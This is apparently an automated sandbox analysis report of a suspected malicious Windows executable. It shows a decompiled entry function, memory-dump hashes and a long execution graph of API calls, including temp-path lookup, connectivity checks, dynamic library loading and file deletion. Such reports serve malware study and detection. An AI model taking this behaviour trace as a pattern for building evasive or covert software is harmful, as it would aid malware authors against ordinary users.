                                                                                                                                                                                                                            			E0040142F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _t17;

				E00401388(_a4, _a8, _a12);
				_v12 = __imp____argc;
				_push( *__imp___environ);
				_push( *__imp____argv);
				_push( *_v12); // executed
				_t17 = E00401193(); // executed
				_v8 = _t17;
				E004013E4();
				return _v8;
			}






                                                                                                                                                                                                                            0x00401445
                                                                                                                                                                                                                            0x0040145f
                                                                                                                                                                                                                            0x00401464
                                                                                                                                                                                                                            0x00401467
                                                                                                                                                                                                                            0x0040146d
                                                                                                                                                                                                                            0x0040146e
                                                                                                                                                                                                                            0x00401476
                                                                                                                                                                                                                            0x00401479
                                                                                                                                                                                                                            0x00401482

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memset$getenvsprintf
                                                                                                                                                                                                                            • String ID: L`wL`w$L`wL`w
                                                                                                                                                                                                                            • API String ID: 28789236-2752994358
                                                                                                                                                                                                                            • Opcode ID: f3b84c926ccf0a1bba959a5459d35e4b6dd6d39a1d93bf3ca747a6ef15472332
                                                                                                                                                                                                                            • Instruction ID: 1659f14638985e292583a778dc2b0d47a8a92077a16294103890a8245a3d1bdc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f3b84c926ccf0a1bba959a5459d35e4b6dd6d39a1d93bf3ca747a6ef15472332
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F098B5A00308AFCB44DFE8D881D9A77F8BB5C304F1044A9F918DB390E634EA049B54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:4.5%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:13.1%
                                                                                                                                                                                                                            Total number of Nodes:932
                                                                                                                                                                                                                            Total number of Limit Nodes:32
                                                                                                                                                                                                                            execution_graph 47922 437d70 SetWindowLongA GetWindowLongA 47923 437daf GetWindowLongA 47922->47923 47924 437dcd SetPropA SetPropA 47922->47924 47923->47924 47925 437dbe SetWindowLongA 47923->47925 47928 422ba4 47924->47928 47925->47924 47933 459934 47928->47933 48017 43f118 47928->48017 48033 43eec0 47928->48033 47929 422bba 47934 45999c 47933->47934 47938 45996a 47933->47938 48040 4597e8 47934->48040 47937 4599a7 47939 459a65 47937->47939 47940 4599b7 47937->47940 47938->47934 47963 45998b 47938->47963 48048 41ac6c 47938->48048 47943 459a6c 47939->47943 47944 459abb 47939->47944 47941 459f03 47940->47941 47942 4599bd 47940->47942 48070 45aae4 22 API calls 47941->48070 47949 459a31 47942->47949 47950 459a4e 47942->47950 47954 459a49 47942->47954 47942->47963 47946 459a72 47943->47946 47980 459ddb 47943->47980 47951 459f1d 47944->47951 47952 459ac8 47944->47952 47944->47954 47947 459aa2 47946->47947 47948 459a79 47946->47948 47947->47954 47947->47963 47974 459db9 47947->47974 47948->47963 47971 459a86 47948->47971 47972 459afd 47948->47972 47955 459fa7 47949->47955 47956 459a37 47949->47956 47957 459a57 47950->47957 47958 459b93 47950->47958 47959 459f26 47951->47959 47960 459f3e 47951->47960 47961 459ec4 IsIconic 47952->47961 47962 459ad3 47952->47962 47953 459d58 47953->47963 47954->47963 48047 4598ac NtdllDefWindowProc_A 47954->48047 48088 4598ac NtdllDefWindowProc_A 47955->48088 47965 459f81 47956->47965 47966 459a40 47956->47966 47957->47954 47967 459ce4 47957->47967 48055 45a038 47958->48055 48071 45a5a4 36 API calls 47959->48071 48072 45a600 67 API calls 47960->48072 47961->47963 47964 459ed8 GetFocus 47961->47964 47962->47941 47962->47954 47963->47929 47964->47963 47977 459ee9 47964->47977 48073 445ed0 47965->48073 47966->47954 47978 459bc7 47966->47978 47967->47963 47995 459d12 47967->47995 47971->47954 47981 459c9c SendMessageA 47971->47981 47975 459b0f 47972->47975 47976 459b18 47972->47976 48064 45a47c IsWindowEnabled 47974->48064 47984 459b25 47975->47984 47985 459b16 47975->47985 48052 45a054 80 API calls 47976->48052 48069 451750 GetCurrentThreadId 73C9AC10 47977->48069 48060 4598ac NtdllDefWindowProc_A 47978->48060 47980->47963 47993 459e01 IsWindowEnabled 47980->47993 47981->47963 48053 45a104 77 API calls 47984->48053 48054 4598ac NtdllDefWindowProc_A 47985->48054 47989 459f93 48086 459840 21 API calls 47989->48086 47991 459ef0 47991->47963 47997 459ef8 SetFocus 47991->47997 47992 459bcd 47998 459c0c 47992->47998 47999 459bea 47992->47999 47993->47963 48005 459e0f 47993->48005 48063 40edc4 SetErrorMode LoadLibraryA 47995->48063 47997->47963 48062 45973c 72 API calls 47998->48062 48061 45974c 67 API calls 47999->48061 48000 459f9e 48087 4598ac NtdllDefWindowProc_A 48000->48087 48002 459d21 48007 459d70 GetLastError 48002->48007 48008 459d30 GetProcAddress 48002->48008 48011 459e16 IsWindowVisible 48005->48011 48007->47963 48008->47953 48008->47963 48009 459bf2 PostMessageA 48009->47963 48010 459c14 PostMessageA 48010->47963 48011->47963 48012 459e24 GetFocus 48011->48012 48065 441704 48012->48065 48014 459e39 SetFocus 48067 43c130 48014->48067 48018 43f143 48017->48018 48019 43f12b 48017->48019 48023 43f13e 48018->48023 48171 43f084 68 API calls 48018->48171 48020 43f19d 48019->48020 48027 43f12d 48019->48027 48021 43c1fc 160 API calls 48020->48021 48029 43f1a6 48021->48029 48024 43f1da 48023->48024 48160 43c1fc 48023->48160 48024->47929 48025 43f1f7 48025->48023 48031 43f1fb 48025->48031 48027->48023 48028 43f23a GetCapture 48027->48028 48028->48023 48029->48024 48170 43eff0 67 API calls 48029->48170 48031->48024 48032 43f21e NtdllDefWindowProc_A 48031->48032 48032->48024 48039 43f118 163 API calls 48033->48039 48034 43eeef 48214 4399a4 99 API calls 48034->48214 48036 43ef01 48215 428b50 101 API calls 48036->48215 48038 43ef06 48038->47929 48039->48034 48041 4597fb 48040->48041 48042 459825 48041->48042 48043 459815 48041->48043 48044 459806 SetThreadLocale 48041->48044 48042->47937 48043->48042 48090 4587a4 48043->48090 48089 40e2e8 84 API calls 48044->48089 48047->47963 48049 41ac76 48048->48049 48050 41ac8a 48049->48050 48116 41abf8 66 API calls 48049->48116 48050->47938 48052->47963 48053->47963 48054->47963 48117 42b534 48055->48117 48058 45a047 LoadIconA 48059 45a053 48058->48059 48059->47963 48060->47992 48061->48009 48062->48010 48063->48002 48064->47963 48066 44170e 48065->48066 48066->48014 48068 43c14c SetFocus 48067->48068 48068->47963 48069->47991 48070->47953 48071->47953 48072->47953 48074 445edf 48073->48074 48075 445ed8 48073->48075 48132 445e34 48074->48132 48076 445edd 48075->48076 48081 445f0a SystemParametersInfoA 48075->48081 48082 445f1b SendMessageA 48075->48082 48076->47989 48079 445ef5 48136 445e50 SystemParametersInfoA 48079->48136 48080 445eec 48135 445e80 6 API calls 48080->48135 48081->48076 48082->48076 48085 445efc 48085->47989 48086->48000 48087->47963 48088->47963 48089->48043 48092 4587bd 48090->48092 48091 4587ee SystemParametersInfoA 48093 458801 CreateFontIndirectA 48091->48093 48094 458819 GetStockObject 48091->48094 48092->48091 48108 424fcc 48093->48108 48095 424fcc 40 API calls 48094->48095 48097 45882d SystemParametersInfoA 48095->48097 48099 458881 48097->48099 48100 45884d CreateFontIndirectA 48097->48100 48113 4250b0 40 API calls 48099->48113 48101 424fcc 40 API calls 48100->48101 48103 458866 CreateFontIndirectA 48101->48103 48105 424fcc 40 API calls 48103->48105 48104 458891 GetStockObject 48106 424fcc 40 API calls 48104->48106 48107 45887f 48105->48107 48106->48107 48107->48042 48114 424b88 GetObjectA 48108->48114 48110 424fde 48115 424dc0 39 API calls 48110->48115 48112 424fe7 48112->48097 48113->48104 48114->48110 48115->48112 48116->48050 48120 42b570 48117->48120 48121 42b53e 48120->48121 48122 42b580 48120->48122 48121->48058 48121->48059 48122->48121 48129 41d8cc 66 API calls 48122->48129 48124 42b59f 48124->48121 48125 42b5b9 48124->48125 48126 42b5ac 48124->48126 48130 426aa0 72 API calls 48125->48130 48131 425f4c 66 API calls 48126->48131 48129->48124 48130->48121 48131->48121 48137 42c5e4 48132->48137 48135->48076 48136->48085 48138 42c5f4 48137->48138 48140 42c614 48137->48140 48144 42c4fc 48138->48144 48142 42c645 GetSystemMetrics 48140->48142 48143 42c64b 48140->48143 48142->48143 48143->48079 48143->48080 48145 42c512 48144->48145 48147 42c56d 48145->48147 48149 42c585 48145->48149 48150 42c4fc 21 API calls 48145->48150 48151 42c575 GetProcAddress 48147->48151 48155 4049c0 48149->48155 48152 42c557 48150->48152 48151->48149 48152->48147 48153 42c565 48152->48153 48154 4049c0 21 API calls 48153->48154 48154->48147 48156 4049c6 48155->48156 48158 4049e1 KiUserCallbackDispatcher 48155->48158 48156->48158 48159 40277c 21 API calls 48156->48159 48158->48143 48159->48158 48161 43c212 48160->48161 48162 43c2ce 48161->48162 48163 43c258 48161->48163 48165 43c2e9 48161->48165 48166 43c2c3 48161->48166 48178 45b21c 126 API calls 48162->48178 48163->48165 48172 45601c 48163->48172 48165->48024 48166->48163 48167 43c32a GetKeyboardState 48166->48167 48168 43c346 48167->48168 48168->48165 48170->48024 48171->48025 48173 45602b 48172->48173 48179 454a44 48173->48179 48176 45604b 48176->48165 48178->48163 48180 454ad8 48179->48180 48193 454a68 48179->48193 48182 454ae9 48180->48182 48210 44e3bc 82 API calls 48180->48210 48183 454b29 48182->48183 48184 454bc1 48182->48184 48186 454b9c 48183->48186 48195 454b44 48183->48195 48185 454bdb 48184->48185 48190 454bd5 SetMenu 48184->48190 48188 454b9a 48185->48188 48189 454bed 48185->48189 48186->48185 48198 454bb0 48186->48198 48187 458260 66 API calls 48187->48193 48188->48185 48212 455b08 74 API calls 48188->48212 48213 45497c 72 API calls 48189->48213 48190->48185 48193->48180 48193->48187 48208 406a70 66 API calls 48193->48208 48209 40d180 66 API calls 48193->48209 48195->48185 48202 454b67 GetMenu 48195->48202 48196 454bf4 48197 4049c0 21 API calls 48196->48197 48200 454c09 48197->48200 48201 454bb9 SetMenu 48198->48201 48200->48176 48207 455f20 10 API calls 48200->48207 48201->48185 48203 454b71 48202->48203 48204 454b8a 48202->48204 48206 454b84 SetMenu 48203->48206 48211 44e3bc 82 API calls 48204->48211 48206->48204 48207->48176 48208->48193 48209->48193 48210->48182 48211->48188 48212->48189 48213->48196 48214->48036 48215->48038 48216 45f1c0 48228 417608 66 API calls 48216->48228 48218 45f1f2 48219 45f1f6 48218->48219 48220 45f1ff 48218->48220 48229 45d2f8 SHGetSpecialFolderLocation 48219->48229 48230 45d3f8 35 API calls 48220->48230 48223 45f209 48231 45d324 8 API calls 48223->48231 48224 45f1fb 48226 4049c0 21 API calls 48224->48226 48227 45f23e 48226->48227 48228->48218 48229->48224 48230->48223 48231->48224 48232 421d84 48234 421d8b 48232->48234 48233 421dd4 48234->48233 48238 41ad54 48234->48238 48241 421d4c 66 API calls 48234->48241 48242 421ccc 66 API calls 48234->48242 48239 41ac6c 66 API calls 48238->48239 48240 41ad5d 48239->48240 48240->48234 48241->48234 48242->48234 48243 434434 48246 43e6bc 48243->48246 48252 43e6ef 48246->48252 48247 43e768 GetClassInfoA 48248 43e78f 48247->48248 48249 43e7cd 48248->48249 48250 43e7a0 UnregisterClassA 48248->48250 48251 43e7ad RegisterClassA 48248->48251 48274 43e88c 48249->48274 48250->48251 48251->48249 48254 43e7c8 48251->48254 48252->48247 48263 43e71c 48252->48263 48301 406a70 66 API calls 48252->48301 48303 40e79c 68 API calls 48254->48303 48256 43e751 48302 40d180 66 API calls 48256->48302 48258 43e7f1 GetWindowLongA 48261 43e827 48258->48261 48262 43e806 GetWindowLongA 48258->48262 48277 40a1d4 48261->48277 48262->48261 48264 43e818 SetWindowLongA 48262->48264 48263->48247 48264->48261 48268 43e83b 48288 424e24 48268->48288 48270 43e845 48271 4049c0 21 API calls 48270->48271 48272 43445b 48271->48272 48305 407a8c 48274->48305 48276 43e7e3 48276->48258 48304 40e79c 68 API calls 48276->48304 48278 40a1e2 48277->48278 48279 40a1d8 48277->48279 48281 441a14 IsIconic 48278->48281 48310 40277c 21 API calls 48279->48310 48282 441a51 GetWindowRect 48281->48282 48283 441a2c GetWindowPlacement 48281->48283 48284 441a5e GetWindowLongA 48282->48284 48283->48284 48285 441a73 GetWindowLongA 48284->48285 48287 441a99 48284->48287 48286 441a87 ScreenToClient ScreenToClient 48285->48286 48285->48287 48286->48287 48287->48268 48289 424e59 48288->48289 48290 424f8c 48288->48290 48311 424168 RtlEnterCriticalSection 48289->48311 48314 4049e4 48290->48314 48294 424f6d 48313 424174 RtlLeaveCriticalSection 48294->48313 48296 424f84 48296->48270 48297 424e63 48297->48294 48312 408f88 CompareStringA 48297->48312 48299 424efa 48300 424f5e CreateFontIndirectA 48299->48300 48300->48294 48301->48256 48302->48263 48303->48249 48304->48258 48309 402c0c 48305->48309 48307 407a9f CreateWindowExA 48308 407ad9 48307->48308 48308->48276 48309->48307 48310->48278 48311->48297 48312->48299 48313->48296 48316 4049ea 48314->48316 48315 404a10 48315->48270 48316->48315 48318 40277c 21 API calls 48316->48318 48318->48316 48319 497cf0 48320 497cf8 48319->48320 48320->48320 48321 497cff Sleep 48320->48321 48403 4737b0 GetTempPathA 48321->48403 48323 497d22 48404 472d44 37 API calls 48323->48404 48325 497d37 48405 404d40 48325->48405 48327 497d4c 48328 4737b0 GetTempPathA 48327->48328 48329 497d54 48328->48329 48330 472d44 37 API calls 48329->48330 48331 497d69 48330->48331 48332 404d40 35 API calls 48331->48332 48333 497d7e 48332->48333 48334 474d34 InternetGetConnectedState 48333->48334 48335 497d87 48334->48335 48336 49811b 48335->48336 48339 404a58 21 API calls 48335->48339 48343 4967d4 21 API calls 48335->48343 48345 474d50 54 API calls 48335->48345 48346 497f6d 48335->48346 48347 497e02 48335->48347 48337 4049e4 21 API calls 48336->48337 48338 498135 48337->48338 48340 4049c0 21 API calls 48338->48340 48339->48335 48341 49813d 48340->48341 48342 4049e4 21 API calls 48341->48342 48344 49814a 48342->48344 48343->48335 48345->48335 48346->48335 48348 4967d4 21 API calls 48346->48348 48357 497f9d 48346->48357 48349 430158 35 API calls 48347->48349 48348->48346 48350 497e11 48349->48350 48351 4758e8 35 API calls 48350->48351 48352 497e3a 48351->48352 48353 404a14 35 API calls 48352->48353 48354 497e47 48353->48354 48360 4758e8 35 API calls 48354->48360 48355 404a58 21 API calls 48356 497f63 48355->48356 48356->48336 48356->48355 48356->48357 48358 404a58 21 API calls 48356->48358 48357->48336 48357->48356 48359 4967d4 21 API calls 48357->48359 48363 474d50 54 API calls 48357->48363 48365 49801a 48357->48365 48358->48357 48359->48357 48361 497e6e 48360->48361 48362 404a14 35 API calls 48361->48362 48364 497e7b 48362->48364 48363->48357 48367 4758e8 35 API calls 48364->48367 48366 49a3e0 385 API calls 48365->48366 48368 498026 48366->48368 48369 497ea2 48367->48369 48371 472ef0 35 API calls 48368->48371 48370 404a14 35 API calls 48369->48370 48372 497eaf 48370->48372 48373 498058 48371->48373 48374 4758e8 35 API calls 48372->48374 48375 498067 48373->48375 48376 4980b6 48373->48376 48377 497ed6 48374->48377 48379 473490 24 API calls 48375->48379 48378 473490 24 API calls 48376->48378 48380 404a14 35 API calls 48377->48380 48381 4980cc 48378->48381 48382 49807c 48379->48382 48383 497ee3 48380->48383 48384 49808c 48381->48384 48387 45a800 PostQuitMessage 48381->48387 48385 49808e 48382->48385 48386 498080 48382->48386 48390 4758e8 35 API calls 48383->48390 48384->48336 48389 473490 24 API calls 48385->48389 48388 45a800 PostQuitMessage 48386->48388 48387->48384 48388->48384 48391 4980a4 48389->48391 48392 497f0a 48390->48392 48391->48384 48393 45a800 PostQuitMessage 48391->48393 48394 404a14 35 API calls 48392->48394 48393->48384 48395 497f17 48394->48395 48396 409628 66 API calls 48395->48396 48397 497f21 48396->48397 48398 409628 66 API calls 48397->48398 48399 497f37 48398->48399 48400 4967d4 21 API calls 48399->48400 48401 497f3f 48399->48401 48400->48401 48402 409bac DeleteFileA 48401->48402 48402->48356 48403->48323 48404->48325 48406 404d51 48405->48406 48407 404d77 48406->48407 48408 404d8e 48406->48408 48414 40500c 48407->48414 48420 404a84 48408->48420 48411 404d84 48412 404dbf 48411->48412 48425 404a14 48411->48425 48415 405019 48414->48415 48419 405049 48414->48419 48417 405025 48415->48417 48418 404a84 35 API calls 48415->48418 48416 4049c0 21 API calls 48416->48417 48417->48411 48418->48419 48419->48416 48421 404a88 48420->48421 48422 404aac 48420->48422 48431 40275c 48421->48431 48422->48411 48426 404a18 48425->48426 48429 404a28 48425->48429 48428 404a84 35 API calls 48426->48428 48426->48429 48427 404a56 48427->48412 48428->48429 48429->48427 48493 40277c 21 API calls 48429->48493 48432 402761 48431->48432 48433 402774 48431->48433 48437 402188 48432->48437 48433->48411 48434 402767 48434->48433 48448 40286c 21 API calls 48434->48448 48438 4021a1 48437->48438 48439 40219c 48437->48439 48441 4021ce RtlEnterCriticalSection 48438->48441 48442 4021d8 48438->48442 48445 4021ad 48438->48445 48449 401a9c RtlInitializeCriticalSection 48439->48449 48441->48442 48442->48445 48456 402094 48442->48456 48445->48434 48446 402303 48446->48434 48447 4022f9 RtlLeaveCriticalSection 48447->48446 48448->48433 48450 401ac0 RtlEnterCriticalSection 48449->48450 48451 401aca 48449->48451 48450->48451 48452 401ae8 LocalAlloc 48451->48452 48453 401b02 48452->48453 48454 401b51 48453->48454 48455 401b47 RtlLeaveCriticalSection 48453->48455 48454->48438 48455->48454 48459 4020a4 48456->48459 48457 4020d0 48461 4020f4 48457->48461 48467 401ea8 9 API calls 48457->48467 48459->48457 48459->48461 48462 402008 48459->48462 48461->48446 48461->48447 48468 40185c 48462->48468 48464 402018 48465 402025 48464->48465 48477 401f7c 9 API calls 48464->48477 48465->48459 48467->48461 48474 401878 48468->48474 48470 401882 48478 401748 48470->48478 48472 40188e 48472->48464 48474->48470 48474->48472 48475 4018d3 48474->48475 48482 4015b4 48474->48482 48490 4014b0 LocalAlloc 48474->48490 48491 401690 VirtualFree 48475->48491 48477->48465 48479 40178e 48478->48479 48480 4017aa VirtualAlloc 48479->48480 48481 4017be 48479->48481 48480->48479 48480->48481 48481->48472 48483 4015c3 VirtualAlloc 48482->48483 48485 4015f0 48483->48485 48486 401613 48483->48486 48492 401468 LocalAlloc 48485->48492 48486->48474 48488 4015fc 48488->48486 48489 401600 VirtualFree 48488->48489 48489->48486 48490->48474 48491->48472 48492->48488 48493->48427 48494 45288c 48495 4528a8 48494->48495 48496 452897 48494->48496 48497 4528a1 48496->48497 48498 4528aa 48496->48498 48503 452868 48497->48503 48509 4523c0 72 API calls 48498->48509 48501 4528b7 48510 4523c0 72 API calls 48501->48510 48504 452874 48503->48504 48505 45288a 48503->48505 48511 451c74 48504->48511 48505->48495 48508 451c74 72 API calls 48508->48505 48509->48501 48510->48495 48512 451c92 48511->48512 48517 451d0d 48511->48517 48513 451d0f 48512->48513 48519 451ca0 48512->48519 48514 4523a8 72 API calls 48513->48514 48514->48517 48515 451cf6 48520 4523a8 48515->48520 48517->48508 48518 43e3f8 66 API calls 48518->48519 48519->48515 48519->48518 48521 4523b1 48520->48521 48524 4528e8 48521->48524 48523 4523be 48523->48517 48525 4529da 48524->48525 48526 4528ff 48524->48526 48525->48523 48526->48525 48545 451e88 48526->48545 48529 45295f 48531 451e88 2 API calls 48529->48531 48530 452939 48532 4524f4 72 API calls 48530->48532 48534 45296d 48531->48534 48533 45294b 48532->48533 48535 4524f4 72 API calls 48533->48535 48536 452997 48534->48536 48537 452971 48534->48537 48540 45295d 48535->48540 48548 4524f4 48536->48548 48538 4524f4 72 API calls 48537->48538 48541 452983 48538->48541 48540->48523 48543 4524f4 72 API calls 48541->48543 48543->48540 48544 4524f4 72 API calls 48544->48540 48560 451e08 48545->48560 48547 451e96 48547->48529 48547->48530 48549 45251a 48548->48549 48550 452533 48549->48550 48551 451e08 2 API calls 48549->48551 48552 451e08 2 API calls 48550->48552 48551->48550 48553 452581 48552->48553 48570 4523ec 48553->48570 48555 45259b 48574 452270 69 API calls 48555->48574 48557 4525cc 48558 451e08 2 API calls 48557->48558 48559 4525d7 48558->48559 48559->48544 48561 441704 48560->48561 48562 451e25 GetWindowLongA 48561->48562 48563 451e62 48562->48563 48564 451e42 48562->48564 48569 451d8c GetWindowLongA 48563->48569 48568 451d8c GetWindowLongA 48564->48568 48567 451e4e 48567->48547 48568->48567 48569->48567 48572 452429 48570->48572 48575 424950 48572->48575 48573 4524ce 48573->48555 48574->48557 48576 424954 GetSysColor 48575->48576 48577 42495f 48575->48577 48576->48577 48577->48573 48578 49ab80 48589 406d28 GetModuleHandleA 48578->48589 48580 49ab90 48593 45a28c 48580->48593 48584 49abc5 48608 45a714 124 API calls 48584->48608 48586 49abd1 48609 40484c 48586->48609 48590 406d5b 48589->48590 48621 404684 48590->48621 48594 45a2ae 48593->48594 48595 45a2eb 48593->48595 48841 45a240 48594->48841 48597 404a14 35 API calls 48595->48597 48603 45a2e9 48597->48603 48598 45a2b8 48601 45a2d4 SetWindowTextA 48598->48601 48598->48603 48599 4049c0 21 API calls 48600 45a30d 48599->48600 48604 45a694 48600->48604 48602 4049c0 21 API calls 48601->48602 48602->48603 48603->48599 48605 45a6a7 48604->48605 48847 452e3c 48605->48847 48606 45a6c8 48606->48584 48608->48586 48610 404865 48609->48610 48611 404884 48610->48611 48612 404895 48610->48612 49020 4047c0 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 48611->49020 49014 4045c4 48612->49014 48615 40488e 48615->48612 48616 4048aa 48617 4048d0 FreeLibrary 48616->48617 48620 4048d6 48616->48620 48617->48620 48618 40490b 48619 404903 ExitProcess 48620->48618 48620->48619 48622 4046b7 48621->48622 48625 404624 48622->48625 48626 404633 48625->48626 48627 404660 48625->48627 48626->48627 48630 40275c 35 API calls 48626->48630 48631 446564 48626->48631 48645 405f94 48626->48645 48627->48580 48630->48626 48632 4465dc 48631->48632 48633 44657e GetVersion 48631->48633 48632->48626 48649 446330 GetCurrentProcessId 48633->48649 48637 4465a2 48681 41a548 68 API calls 48637->48681 48639 4465ac 48682 41a4f4 68 API calls 48639->48682 48641 4465bc 48683 41a4f4 68 API calls 48641->48683 48643 4465cc 48684 41a4f4 68 API calls 48643->48684 48646 405fa4 GetModuleFileNameA 48645->48646 48647 405fc0 48645->48647 48822 4061d0 GetModuleFileNameA RegOpenKeyExA 48646->48822 48647->48626 48685 40a664 48649->48685 48652 404a14 35 API calls 48653 446379 48652->48653 48654 446383 GlobalAddAtomA GetCurrentThreadId 48653->48654 48655 40a664 66 API calls 48654->48655 48656 4463bd 48655->48656 48657 404a14 35 API calls 48656->48657 48658 4463ca 48657->48658 48659 4463d4 GlobalAddAtomA 48658->48659 48688 404e80 48659->48688 48663 446401 48694 445f34 48663->48694 48665 44640b 48702 445d5c 48665->48702 48667 446417 48706 457fc8 48667->48706 48669 44642a 48723 4590ac 48669->48723 48671 446440 48737 41a634 68 API calls 48671->48737 48673 44646a GetModuleHandleA 48674 44648a 48673->48674 48675 44647a GetProcAddress 48673->48675 48676 4049c0 21 API calls 48674->48676 48675->48674 48677 44649f 48676->48677 48678 4049c0 21 API calls 48677->48678 48679 4464a7 48678->48679 48680 41a4a8 68 API calls 48679->48680 48680->48637 48681->48639 48682->48641 48683->48643 48684->48632 48738 40a678 48685->48738 48689 404e84 RegisterClipboardFormatA 48688->48689 48690 41af14 48689->48690 48691 41af1a 48690->48691 48692 41af2f RtlInitializeCriticalSection 48691->48692 48693 41af44 48692->48693 48693->48663 48695 4460a1 48694->48695 48696 445f48 SetErrorMode 48694->48696 48695->48665 48697 445f6c GetModuleHandleA GetProcAddress 48696->48697 48698 445f88 48696->48698 48697->48698 48699 445f95 LoadLibraryA 48698->48699 48700 446083 SetErrorMode 48698->48700 48699->48700 48701 445fb1 10 API calls 48699->48701 48700->48665 48701->48700 48703 445d62 48702->48703 48704 445ed0 33 API calls 48703->48704 48705 445dd0 48704->48705 48705->48667 48707 457fd2 48706->48707 48758 421b3c 48707->48758 48709 457fe8 48762 458384 LoadCursorA 48709->48762 48712 458021 48713 45805d 73C9AC50 73C9AD70 73C9B380 48712->48713 48714 458093 48713->48714 48767 424c3c 48714->48767 48716 45809f 48717 424c3c 37 API calls 48716->48717 48718 4580b1 48717->48718 48719 424c3c 37 API calls 48718->48719 48720 4580c3 48719->48720 48721 4587a4 48 API calls 48720->48721 48722 4580d0 48721->48722 48722->48669 48724 4590bb 48723->48724 48725 421b3c 66 API calls 48724->48725 48726 4590d1 48725->48726 48727 45917c LoadIconA 48726->48727 48785 42b7c8 48727->48785 48729 45919f GetModuleFileNameA OemToCharA 48730 4591e8 48729->48730 48731 45920e CharLowerA 48730->48731 48732 459231 48731->48732 48733 459242 48732->48733 48787 4593b4 48732->48787 48811 45b188 21 API calls 48733->48811 48736 459264 48736->48671 48737->48673 48739 40a69c 48738->48739 48741 40a6c7 48739->48741 48751 40a26c 66 API calls 48739->48751 48742 40a71f 48741->48742 48749 40a6dc 48741->48749 48753 404ab0 48742->48753 48744 40a715 48747 40500c 35 API calls 48744->48747 48745 40a673 48745->48652 48746 4049c0 21 API calls 48746->48749 48747->48745 48748 40500c 35 API calls 48748->48749 48749->48744 48749->48746 48749->48748 48752 40a26c 66 API calls 48749->48752 48751->48741 48752->48749 48754 404a84 35 API calls 48753->48754 48755 404ac0 48754->48755 48756 4049c0 21 API calls 48755->48756 48757 404ad8 48756->48757 48757->48745 48760 421b43 48758->48760 48759 421b66 48759->48709 48760->48759 48771 421cf4 66 API calls 48760->48771 48763 4583a3 48762->48763 48764 4583bc LoadCursorA 48763->48764 48766 45800b GetKeyboardLayout 48763->48766 48772 45843c 48764->48772 48766->48712 48768 424c42 48767->48768 48775 424180 48768->48775 48770 424c64 48770->48716 48771->48759 48773 40275c 35 API calls 48772->48773 48774 45844f 48773->48774 48774->48763 48776 42419b 48775->48776 48783 424168 RtlEnterCriticalSection 48776->48783 48778 4241a5 48779 40275c 35 API calls 48778->48779 48782 424202 48778->48782 48779->48782 48781 424253 48781->48770 48784 424174 RtlLeaveCriticalSection 48782->48784 48783->48778 48784->48781 48786 42b7d4 48785->48786 48786->48729 48788 45953f 48787->48788 48789 4593dd 48787->48789 48790 4049c0 21 API calls 48788->48790 48789->48788 48812 422bcc 48789->48812 48792 459554 48790->48792 48792->48733 48793 4593f6 GetClassInfoA 48794 45941c RegisterClassA 48793->48794 48799 459451 48793->48799 48795 459435 48794->48795 48794->48799 48819 406a70 66 API calls 48795->48819 48797 459442 48820 40d144 35 API calls 48797->48820 48815 407ae4 48799->48815 48801 4594a8 48802 4049c0 21 API calls 48801->48802 48803 4594b6 SetWindowLongA 48802->48803 48804 4594d6 48803->48804 48805 459501 GetSystemMenu DeleteMenu DeleteMenu 48803->48805 48806 45a038 73 API calls 48804->48806 48805->48788 48807 459532 DeleteMenu 48805->48807 48808 4594dd SendMessageA 48806->48808 48807->48788 48809 45a038 73 API calls 48808->48809 48810 4594f5 SetClassLongA 48809->48810 48810->48805 48811->48736 48813 422c0a 48812->48813 48814 422bdc VirtualAlloc 48812->48814 48813->48793 48814->48813 48821 402c0c 48815->48821 48817 407af7 CreateWindowExA 48818 407b2f 48817->48818 48818->48801 48819->48797 48820->48799 48821->48817 48823 406253 48822->48823 48824 406213 RegOpenKeyExA 48822->48824 48840 406018 12 API calls 48823->48840 48824->48823 48825 406231 RegOpenKeyExA 48824->48825 48825->48823 48827 4062dc lstrcpyn GetThreadLocale GetLocaleInfoA 48825->48827 48829 406313 48827->48829 48830 4063f6 48827->48830 48828 406278 RegQueryValueExA 48831 406298 RegQueryValueExA 48828->48831 48832 4062b6 RegCloseKey 48828->48832 48829->48830 48833 406323 lstrlen 48829->48833 48830->48647 48831->48832 48832->48647 48835 40633b 48833->48835 48835->48830 48836 406360 lstrcpyn LoadLibraryExA 48835->48836 48837 406388 48835->48837 48836->48837 48837->48830 48838 406392 lstrcpyn LoadLibraryExA 48837->48838 48838->48830 48839 4063c4 lstrcpyn LoadLibraryExA 48838->48839 48839->48830 48840->48828 48842 45a275 48841->48842 48843 45a255 GetWindowTextA 48841->48843 48845 404a14 35 API calls 48842->48845 48844 404ab0 35 API calls 48843->48844 48846 45a273 48844->48846 48845->48846 48846->48598 48848 452e52 48847->48848 48849 452f66 48848->48849 48856 41aa2c 48848->48856 48849->48606 48851 452f2b 48851->48606 48852 452ee2 48852->48851 48866 406a70 66 API calls 48852->48866 48854 452f19 48867 40d180 66 API calls 48854->48867 48857 41aa42 48856->48857 48859 41aa77 48857->48859 48880 41a8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48857->48880 48868 41a984 48859->48868 48862 41aaa2 48864 41aaba 48862->48864 48882 41a928 66 API calls 48862->48882 48864->48852 48866->48854 48867->48851 48870 41a9ae 48868->48870 48879 41aa02 